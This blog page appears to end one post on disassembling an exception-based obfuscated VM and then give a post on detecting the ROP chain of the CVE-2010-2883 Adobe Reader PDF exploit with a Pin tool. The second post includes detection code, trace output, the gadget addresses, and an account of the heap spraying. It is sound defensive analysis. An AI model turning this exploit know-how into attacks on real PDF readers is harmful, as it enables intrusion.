<span style="font-family: Verdana, sans-serif;">Moreover, the opcodes aren't referenced by any direct call, because they are executed only due to the "RaiseException" API, which is guarded within various nested try-except blocks. </span><span style="font-family: Verdana, sans-serif;">This results in a chain of filter expressions and except bodies (</span><span style="font-family: Verdana, sans-serif;">which constitute an additional layer above the opcode routines) </span><span style="font-family: Verdana, sans-serif;">that are triggered by the scopetable mechanism:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div class="p1">
<span style="color: purple; font-family: Courier New, Courier, monospace;">; while(eip != EIP_HALT)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401ACE loc_401ACE: ; CODE XREF: _main+A92 j</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401ACE mov dword_404370, eax</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401AD3 cmp eax, 0FFFFFFFFh</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401AD6 jz loc_401D87</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="color: purple; font-family: Courier New, Courier, monospace;">; this is the code guarded inside the nested try/excepts</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B11 lea edx, [ebp+eax*4+Arguments]</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B18 push edx ; lpArguments</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B19 push 2 ; nNumberOfArguments</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B1B push ecx ; dwExceptionFlags</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B1C mov eax, [ebp+eax*4+dwExceptionCode]</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B23 push eax ; dwExceptionCode</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B24 call ds:RaiseException</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B57 jmp loc_401D71</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="color: purple; font-family: Courier New, Courier, monospace;">; a couple of filter expressions and except bodies</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B5C loc_401B5C: ; DATA XREF: .rdata:00403290 o</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B5C mov eax, [ebp+var_14]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B5F mov ecx, [eax]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B61 mov edx, [ecx]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B63 mov [ebp+var_4F0], edx</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B69 call sub_401050</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6E retn</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6F ; ---------------------------------------------------------------------------</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6F</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6F loc_401B6F: ; DATA XREF: .rdata:00403294 o</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6F mov esp, [ebp+var_18]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B72 mov [ebp+var_4], 6</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B79 mov [ebp+var_4], 5</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B80 mov [ebp+var_4], 4</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B87 mov [ebp+var_4], 3</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B8E mov [ebp+var_4], 2</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B95 mov [ebp+var_4], 1</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B9C mov [ebp+var_4], 0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA3 jmp loc_401D71</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA8 ; ---------------------------------------------------------------------------</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA8</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA8 loc_401BA8: ; DATA XREF: .rdata:00403284 o</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA8 mov eax, [ebp+var_14]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BAB mov edx, [eax]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BAD mov ecx, [edx]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BAF mov [ebp+var_4D4], ecx</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BB5 call sub_401170</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBA retn</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBB ; ---------------------------------------------------------------------------</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBB</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBB loc_401BBB: ; DATA XREF: .rdata:00403288 o</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBB mov esp, [ebp+var_18]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBE mov [ebp+var_4], 5</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BC5 mov [ebp+var_4], 4</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BCC mov [ebp+var_4], 3</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BD3 mov [ebp+var_4], 2</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BDA mov [ebp+var_4], 1</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BE1 mov [ebp+var_4], 0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BE8 jmp loc_401D71</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="color: purple; font-family: Courier New, Courier, monospace;">; outside the nested try/block there is the code to increase the virtual EIP</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401D71 loc_401D71: ; CODE XREF: _main+867 j</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401D71 ; _main+8B3 j </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">As you can see, the algorithm is all broken and it's not easy to figure out what the code is attempting to do, neither it is to automate the detection of specific routines.</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
</div>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com1tag:blogger.com,1999:blog-8573685359056491736.post-38051305036799359362013-03-21T09:41:00.001-07:002013-03-21T09:41:09.689-07:00Binary Instrumentation for Exploit Analysis Purposes (part 2)<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Introduction.</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is the second part of the <a href="http://scrammed.blogspot.com/2013/03/binary-instrumentation-for-exploit_10.html">article</a> about binary instrumentation for exploit analysis purposes and this time we will discuss a real pdf exploit: a Stack-based buffer overflow in CoolType.dll (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883">CVE-2010-2883</a>). You can retrieve it from the metasploit module </span><span style="font-family: Courier New, Courier, monospace;">exploit/windows/fileformat/adobe_cooltype_sing</span><span style="font-family: Verdana, sans-serif;"> .</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In order to bypass DEP, this exploit makes use of Heap Spraying to run its ROP shellcode. On the other hand, our goal is to come closer to the point where the vulnerability occurs, so one clever thing to do is to use Pintool to detect the ROP itself.</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">To do that, we can simply check if the instruction executed after a RET is located after a CALL, but be aware that performing this test alone could lead to false positives. A better test would be to control wether this check works for three times in a row, but this gives rise to some Pintool's problems that we will discuss later.</span><br />
<span style="font-family: Verdana, sans-serif;">Another method to detect ROP is to control the ESP register and look for the "0c0c0c0c" value, but inspecting the register with Pin is very slow and will degrade the performance of your Pintool. So we won't implement this one.</span><br />
<span style="font-family: Verdana, sans-serif;">Finally, one last check is to log the "pop ESP" instruction, that is a common ROP gadget employed right before the ROP shellcode itself.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Detecting the ROP with a Pintool.</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">Here is the function to detect the ROP:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">#define LAST_EXECUTED 1000
ADDRINT LastExecutedBuf[LAST_EXECUTED];
UINT32 LastExecutedPos = 0;
UINT32 PreviousOpcode;
char TempString[12];
#define PREV_OPCODE(__dist) (((UINT16*)(AddrEip - __dist))[0])
typedef struct _OPC_CHECK
{
UINT8 Delta;
UINT16 Opcode;
} OPC_CHECK;
OPC_CHECK OpcCheck[] =
{
6, 0x15ff, 2, 0x12ff, 2, 0x11ff, 2, 0x13ff, 2, 0x17ff, 2, 0x16ff, 2, 0x10ff,
3, 0x55ff, 3, 0x50ff, 3, 0x51ff, 3, 0x52ff, 3, 0x53ff, 4, 0x54ff, 3, 0x55ff,
3, 0x56ff, 3, 0x57ff, 3, 0x59ff, 6, 0x95ff, 6, 0x97ff, 6, 0x76ff, 6, 0x96ff,
6, 0x94ff, 6, 0x93ff, 6, 0x92ff, 6, 0x91ff, 6, 0x90ff, 7, 0x14ff, 7, 0x94ff,
3, 0x14ff, 4, 0x54ff, 2, 0xd0ff, 2, 0xd1ff, 2, 0xd2ff, 2, 0xd3ff, 2, 0xd4ff,
2, 0xd5ff, 2, 0xd6ff, 2, 0xd7ff, 0, 0
};
char* QuickDwordToString(char *String, UINT32 Value)
{
int i;
UINT32 TempVal = Value;
UINT8 TempByte;
for(i = 0; i < 8; i++)
{
TempByte = (TempVal & 0xF) + 0x30;
if(TempByte > 0x39) TempByte += 7;
String[7-i] = TempByte;
TempVal >>= 4;
}
return String;
}
VOID DetectPopEsp(ADDRINT AddrEip, UINT32 Opcode)
{
UINT32 i, k;
if(PreviousOpcode == 557 && // int for RET
AddrEip < 0x70000000 &&
((UINT8*)(AddrEip-5))[0] != 0xE8)
{
k = 0;
while(OpcCheck[k].Delta != 0)
{
if( PREV_OPCODE(OpcCheck[k].Delta) == OpcCheck[k].Opcode)
break;
k++;
}
if(OpcCheck[k].Delta == 0)
{
fprintf(OutTrace, "%s RETurned here, but not after call\n", QuickDwordToString(TempString, AddrEip));
}
}
if(Opcode == 486) // int for POP
{
if(((UINT8*)AddrEip)[0] == 0x5C)
{
fprintf(OutTrace, "%s POP ESP DETECTED!!\n", QuickDwordToString(TempString, AddrEip));
fprintf(OutTrace,"Dumping list of previously executed EIPs \n");
// dump last executed buffer on file
for(i = LastExecutedPos; i < LAST_EXECUTED; i++)
{
fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, LastExecutedBuf[i]));
}
for(i = 0; i < LastExecutedPos; i++)
{
fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, LastExecutedBuf[i]));
}
fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, AddrEip));
fflush(OutTrace);
}
}
LastExecutedBuf[LastExecutedPos] = AddrEip;
LastExecutedPos++;
if(LastExecutedPos >= LAST_EXECUTED)
{
// circular logging
LastExecutedPos = 0;
}
PreviousOpcode = Opcode;
}
</code></pre>
<br />
<span style="font-family: Verdana, sans-serif;">Include it in the source code of the basic Pintool provided in <a href="http://scrammed.blogspot.com/2013/03/binary-instrumentation-for-exploit_10.html">the first part of the article</a> and</span><span style="font-family: Verdana, sans-serif;"> use the following line:</span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span><br />
<span style="font-family: Courier New, Courier, monospace;">INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectEip, IARG_INST_PTR, IARG_UINT32, INS_Opcode(Ins), IARG_END);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">in the "Instruction()" function to call the "DetectEip()" function before every instruction is executed.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Also, add these lines:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>UINT32 Opcode;</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="font-family: Courier New, Courier, monospace;"> </span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>va_list VaList;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>va_start( VaList, AddrEip);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Opcode = va_arg(VaList, UINT32);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>va_end(VaList);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>DetectPopEsp(AddrEip, Opcode);</span><br />
<br />
<br />
<span style="font-family: Verdana, sans-serif;">in the "DetectEip()" function (where specified by the comments).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">Now a brief description of what the code does. Basically, this Pintool looks for two opcodes: the one corresponding to RET (Pin code 557) and the one corresponding to POP (Pin code 486).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If a RET is encountered, the Pintool follows it and checks if the previous opcode is a CALL, looking for the E8 opcode or the ones provided in the "OpcCheck[].Opcode" array (the list may not be complete, but while testing it was reasonably accurate). In case it's not, it notifies the user with the message: "*Address* RETurned here, but not after call".</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If a POP is encountered, it checks if it is a "POP ESP" and, in case it is, it notifies the user by printing "*Adress* </span>POP ESP DETECTED!!"<span style="font-family: Verdana, sans-serif;"> and dumps the last executed instructions on file.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">That's it. You are finally ready to compile the Pintool and run it within Adobe Acrobat Reader to analyse the PDF exploit.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Analyzing the output</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here is an excerpt from the output produced by the Pintool:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Exception handler address: 7C91EAEC </span><br />
<span style="font-family: Courier New, Courier, monospace;">Starting Pintool</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\Programmi\Adobe\Reader 9.0\Reader\AcroRd32.exe </span><br />
<span style="font-family: Courier New, Courier, monospace;">Main exe Base: 00400000 End: 00453FFF</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\kernel32.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 7C800000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 7C8FEFFF </span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\ntdll.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 7C910000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 7C9C5FFF </span><br />
<span style="font-family: Courier New, Courier, monospace;">Starting thread 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">0D6D8192 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">02D43FA5 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">22326DB0 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">5B18174F RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">08171CF0 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">08171D47 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">06066EED RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">0633DE6B RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A82A714 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A82A714 POP ESP DETECTED!!</span><br />
<span style="font-family: Courier New, Courier, monospace;">Dumping list of previously executed EIPs </span><br />
<span style="font-family: Courier New, Courier, monospace;">0803DDC6</span><br />
<span style="font-family: Courier New, Courier, monospace;">0803DDCA</span><br />
<span style="font-family: Courier New, Courier, monospace;">0803DDCC</span><br />
<span style="font-family: Courier New, Courier, monospace;">0803DDCD</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">0808B304</span><br />
<span style="font-family: Courier New, Courier, monospace;">0808B305</span><br />
<span style="font-family: Courier New, Courier, monospace;">0808B307</span><br />
<span style="font-family: Courier New, Courier, monospace;">0808B308</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A80CB38</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A80CB3E</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A80CB3F</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A82A714</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">From the log above we can see all the modules being loaded and threads being created. Then, we notice some false positives: these are legitimate RETs, which don't return to an instruction after a CALL.</span><br />
<span style="font-family: Verdana, sans-serif;">Finally, we get to the part where both checks are detected: the code returns to an instruction not located after a call and a "POP ESP" instruction is executed.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In particular, the last logged EIPs correspond to following ROP gadgets:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> 4A80CB38 81C5 94070000 ADD EBP,794</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 4A80CB3E C9 LEAVE</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 4A80CB3F C3 RETN</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> 4A82A714 5C POP ESP</span><br />
<span style="font-family: Courier New, Courier, monospace;">(4A82A715 C3 RETN)</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">So we have located where the exploit occurs (i.e. the address "0808B308</span><span style="font-family: 'Courier New', Courier, monospace;">")</span><span style="font-family: Verdana, sans-serif;">: not bad!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Note that the last instruction reported here (the RETN </span><span style="font-family: Verdana, sans-serif;">between parentheses</span><span style="font-family: Verdana, sans-serif;">) is not logged by the Pintool because a crash happened right after its execution... but...</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: large;"><u>...Why???</u></span></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">As I said before, this exploit makes use of Heap Spraying. In particular, we can see it by debugging Adobe Acrobat Reader while Pin is not instrumenting it and setting a breakpoint on address "0808B308". Now, if we open the PDF exploit and leave the debugger running, we can inspect the memory when the code hits the breakpoint:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_GOaqzGm-88HkmEtQ5EEFW9Taq1I89FO1Oo4qviCy6irjv0a4CI61YbHUTut-52SGp_KVjo7lL7keb5WFIsCKDh36-lJu-4X-DgBod3kF1mCk9034XNuD8iUqhCfniyYUpz_LR7P4Q94/s1600/nopin_sc1-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_GOaqzGm-88HkmEtQ5EEFW9Taq1I89FO1Oo4qviCy6irjv0a4CI61YbHUTut-52SGp_KVjo7lL7keb5WFIsCKDh36-lJu-4X-DgBod3kF1mCk9034XNuD8iUqhCfniyYUpz_LR7P4Q94/s1600/nopin_sc1-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwkzOXn5rqJMXph9sYjqMZchrluBIBKw6_fz1Us0dAYAs2mXS9pVYh8NrnzSJKbvK4y76DI0NhFvBTAa6S1EIVspGN1rylFSURS96T1BlGu0MnzYisOPBiDFWzLTk2-CfXOtrUM9_BokE/s1600/nopin_area-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwkzOXn5rqJMXph9sYjqMZchrluBIBKw6_fz1Us0dAYAs2mXS9pVYh8NrnzSJKbvK4y76DI0NhFvBTAa6S1EIVspGN1rylFSURS96T1BlGu0MnzYisOPBiDFWzLTk2-CfXOtrUM9_BokE/s1600/nopin_area-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">This is exactly what we were expecting: you can notice the ROP shellcode at "0c0c0c0c" and the Heap Spraying all around. On the other hand, if we debug the Adobe Acrobat Reader while Pin is instrumenting it, we obtain:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh03BPCL-_N37ibjB8WkhInJV4SH2FnbZk20bOrU5xD5ePBFoGbIqy7ESSyrTrokT1w0x_6HEknuIL0FAyExQjWrzFaGg9uyTvFu53XJ5VDU6eCxWqyWVlkAvBtLRd_geVSNzEYYaNw1Qk/s1600/pin_nosc-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh03BPCL-_N37ibjB8WkhInJV4SH2FnbZk20bOrU5xD5ePBFoGbIqy7ESSyrTrokT1w0x_6HEknuIL0FAyExQjWrzFaGg9uyTvFu53XJ5VDU6eCxWqyWVlkAvBtLRd_geVSNzEYYaNw1Qk/s1600/pin_nosc-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx4rqYXobn_SzT2lCAUkSUA0lcRsBt0yYgjP4sCjJQrYMUQnJB21eqhYl86VsyQcy_ev8aGKAZ2zemzuHta9Dh7iGrl-kQqON-pXkpIe8K0b0JDg0u6-75PH_UUmujrD1ejxLRIAYkW8k/s1600/pin_area-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx4rqYXobn_SzT2lCAUkSUA0lcRsBt0yYgjP4sCjJQrYMUQnJB21eqhYl86VsyQcy_ev8aGKAZ2zemzuHta9Dh7iGrl-kQqON-pXkpIe8K0b0JDg0u6-75PH_UUmujrD1ejxLRIAYkW8k/s1600/pin_area-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">So... no ROP, nor Heap Spraying... but the blocks of memory are still allocated. Who has allocated them?</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">To get the answer we need to look inside the code window:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitaIWlwSzeqt644DjW3MpBxtNOt5kMyouGbi2AEwpkHi3T2AA-c3HNeKb6Izke9hgaFx-Uh1DC7ynsYdOSZmD-9fHA7daFHvJZjjiMv4ofx-2qlgkxME_i4pqGQnDd3CyvbYN8yL-W7Lw/s1600/pin_code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitaIWlwSzeqt644DjW3MpBxtNOt5kMyouGbi2AEwpkHi3T2AA-c3HNeKb6Izke9hgaFx-Uh1DC7ynsYdOSZmD-9fHA7daFHvJZjjiMv4ofx-2qlgkxME_i4pqGQnDd3CyvbYN8yL-W7Lw/s1600/pin_code.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">... It's Pin itself!</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Pin allocates a lot of memory to perform binary instrumentation, occupying also the addresses usually employed by the Heap Spraying. This means that when the ROP shellcode is executed, it's not located where it is supposed to be and this will result in Adobe Acrobat Reader crashing.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;">Another problem I ran into, is that even when I modified the Pintool in order to force the exploit to work with the shellcode that was placed at a different address than 0x0C0C0C0C, the exploit still crashed.</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;">This time I could see it run all the ROP shellcode, which allocates a block of executable memory, copies itself to it and then jumps to it.</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;">However, this executable shellcode (not ROP) tried to decrypt (and therefore overwrite) itself causing</span><span style="font-family: Verdana, sans-serif;"> a memory access violation and making the instrumented shellcode crash. </span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;">I haven't investigated the problem yet, but it seems that the instrumented shellcode is placed in an area that is read only, therefore the self decryption failed when writing the decrypted bytes back to the shellcode memory. </span></div>
